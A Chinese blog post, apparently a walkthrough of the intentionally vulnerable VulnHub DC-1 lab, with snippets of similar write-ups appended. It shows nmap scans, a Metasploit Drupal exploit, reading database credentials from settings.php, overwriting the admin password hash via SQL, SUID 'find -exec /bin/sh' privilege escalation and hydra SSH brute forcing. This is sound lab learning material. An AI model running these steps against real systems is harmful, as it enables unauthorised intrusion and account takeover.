DC-1靶机渗透

最新推荐文章于 2024-11-30 13:07:51 发布
最新推荐文章于 2024-11-30 13:07:51 发布
阅读量1.2k 收藏 2
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/plant1234/article/details/124224041
版权

简介

靶机名称:DC1
下载地址:https://www.vulnhub.com/entry/dc-1-1,292/

一、信息收集

利用nmap扫描发现主机:

nmap -sP 192.168.229.0/24

在这里插入图片描述

获取主机为:192.168.229.180

收集主机端口和其它信息:

nmap -sS -sV -T5 -A -p- 192.168.229.180

在这里插入图片描述
在这里插入图片描述

发现开发22端口和80端口,并且运行在Linux上

二、漏洞查找

发现有80端口直接访问得到:

在这里插入图片描述

发现是cms是drupal,用msf看一下有没有可以利用的

在这里插入图片描述

这里我用序号为2的:

在这里插入图片描述
在用命令:options
查看需要设置的参数:

在这里插入图片描述

需要设置rhosts:

set rhosts 192.168.229.180

在这里插入图片描述

然后run

然后就获得了meterpreter。
输入shell,获得交互式shell

在这里插入图片描述

可以用python达到一个交互效果:

python -c 'import pty; pty.spawn("/bin/bash")'

得到:
在这里插入图片描述
查找到第一个flag:

在这里插入图片描述

提权

根据第一个flag提示去寻找cms的cinfig file

并且Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看

查看一下:

在这里插入图片描述

得到第二个flag

发现了flag2和数据库的账号密码,flag2提示,提升权限为root来查看敏感文件,或者直接爆破

我们先进入数据库查看

在这里插入图片描述

查看数据:
在这里插入图片描述

在这里插入图片描述

选则users表查看用户信息:

在这里插入图片描述
发现有个admin用户但不知道密码:

可以参考这篇博客置换密码:
https://drupalchina.cn/node/2128

在drupal目录站点敲入以下命令:

php scripts/password-hash.sh admin

在这里插入图片描述

然后在user表中将密码替换为上面hash后面的值:

update users set pass="$S$DZOvssEYtKnlk5jLGjdReDQJyO.y36sNqH5uX/S/2rGOEsw32Ju4";

在这里插入图片描述
这样admin的密码就被改成admin

在drupal网站登录看看:

在这里插入图片描述
登录成功

发现flag3:

在这里插入图片描述

flag3提示,提权并提示 -exec,想到suid提权 find 命令

使用命令查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

在这里插入图片描述

使用命令测试,发现为root权限

在这里插入图片描述

利用/bin/sh命令到达root的shell交互:

find / -name 666 -exec "/bin/sh" \;

在这里插入图片描述

获取最终flag

至此,完成渗透。此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,

在这里插入图片描述我们可以使用 hydra 进行爆破

hydra -l flag4 -P pass.txt ssh://192.168.229.180

在这里插入图片描述

连接:

在这里插入图片描述
参考连接:
https://blog.youkuaiyun.com/Auuuuuuuu/article/details/97832336

南冥~
关注
DC-1靶机渗透
applekelly的博客
03-28 132
主机扫描,扫描主机IP查看靶机mac地址,从而查询IP22端口和80端口是我们的突破口,访问网页查看站点信息,也可以自行判断,网页一看就是cms就是drupal也可以用kalli自带的工whatweb扫描可以扫出cms,然后再用dirb工具扫一下网站目录还是扫出了很多目录,咱们先放一放暂时得到了以下信息CMS是Drupal Apache 2.2.22PHP 5.4.45。
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1330
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
DC-1 靶机渗透
m0_62970186的博客
04-02 1268
文章目录DC-1 靶机渗透***\*前提思路\*******\*信息收集\*******\*端口扫描\*******\*网站信息\*******\*漏洞映射\*******\*权限提升\*******\*提权思路\**** DC-1 靶机渗透 *概况*: 下载地址 https://www.vulnhub.com/entry/dc-1,292/ *官方描述:* DC-1 is a purposely built vulnerable lab for the purpose of gaining experi
DC-1渗透测试
sucker的博客
10-27 1484
进入数据库后想更改密码,但是密码是进行了专门加密的,当知道了系统下自带加密脚本,于是我借助加密脚本生成了一个符合系统的密码,并且将数据库。下有什么,然后把想用的密码传入脚本,然后让脚本自动加密生成一个系统支持的密码形式。搜索总共有七个漏洞可以利用,其中第一个经过测试是可以成功的,复制粘贴一下。使用更改后的密码,登陆上网站后,拿到了。)并将它与当前的终端关联起来,然后在新的伪终端内启动一个。、首先我将测试机的网站进行了扫描,由此发现它的框架版本是。成功找到账户和密码,但密码进行了加密,使用。
渗透项目】靶机DC-1渗透过程
命运的旋律的博客
03-18 566
文章目录信息收集主机发现端口扫描网站指纹扫描目录扫描浏览网站漏洞利用提权操作后记 本文是对靶机DC-1渗透的关键点进行简单记录 信息收集 主机发现 端口扫描 先利用masscan快速确认开放端口,再用nmap确认端口服务 网站指纹扫描 目录扫描 浏览网站 访问目标网站查找有用信息 登陆网站就看到大大登陆界面,因此肯定先从这个登陆界面下手 在尝试进行sql万能密码登陆以及确认已注册用户并...
DC-1靶机渗透测试
Liumx0105的博客
12-20 1003
思路:信息收集→漏洞探测→漏洞利用→提权
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1351
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-1靶机渗透笔记
qq_60600840的博客
08-08 317
DC-1靶机安全渗透靶机
DC-1靶机
weixin_52525624的博客
02-24 334
nmap -sP 192.168.1.0/24 然后找到咱们的靶机 nmap -sV -Pn -n 192.168.1.57 访问该站点并查看robots.txt敏感文件 依次访问robots.txt文件中的敏感文件目录信息,发现UPGRADE.txt文件爆露出版本号 寻找drupal 7.X版本漏洞,并进行利用 2:使用MSF搜索相关模块并进行利用 Search drupal Use exploit/unix/webapp/drupal_drup...
dc-1靶机
qq_63267612的博客
09-28 1386
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal。使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupal,drupal有一些可以利用的漏洞进入msf。
DC-1靶机渗透教程
最新发布
m0_72538839的博客
11-30 1986
声明:该笔记为up主警告:此教程仅作学习用途,若有用于非法行为的,概不负责环境配置:kali和DC-1网络都设置为桥接模式,也可都设置为net模式DC-1_ip:未知。
DC1渗透
qq_43430261的博客
03-06 785
kail虚拟机ip为 nmap -sP 192.168.72.197/24 扫描本网段存活主机 nmap -sV 192.168.72.198 查看靶机开放了哪些服务及服务版本 发现靶机开放ssh服务和http服务 尝试访问http服务 使用插件Wappalyzer进行网站指纹识别发现网站使用Drupal 7.x管理系统 用MSF search一下该CMS已知的漏洞 启动msf(m...
记录一下 DC1靶机渗透
吃醋不爱蘸饺子的胡诌乱造
01-12 625
一.准备 首先kaili攻击机和DC1靶机都是桥接网络,为了nmap扫描(桥接网络在设置里)。 二.namp扫描 1.首先扫描一下这个网段 很容易可以看见DC1靶机的ip地址192.168.1.108(这个当时扫了半天都没有扫到,我在nat网络和桥接里反复横跳,最终还是它自己好了(充分证明了当你做不出来,可以歇一歇然后自己就好了。猜测是网络切换需要一定的时间) 2.扫描这个ip地址开放的端口 可以看出来这里开放了80端口,我们可以看一下! 然后就是上图这个样子! 三.开始渗透 典型的drupal(我
DC-1靶机渗透学习
里丘~班诺的小屋
08-31 2884
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.131(未知) 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式 1、找到kali的IP地址,用nmap扫描同一网段找到靶机的IP 一般扫描出来的在中间而129是kali的,所以可以确定的是靶机的地址是192.168...
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 3078
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值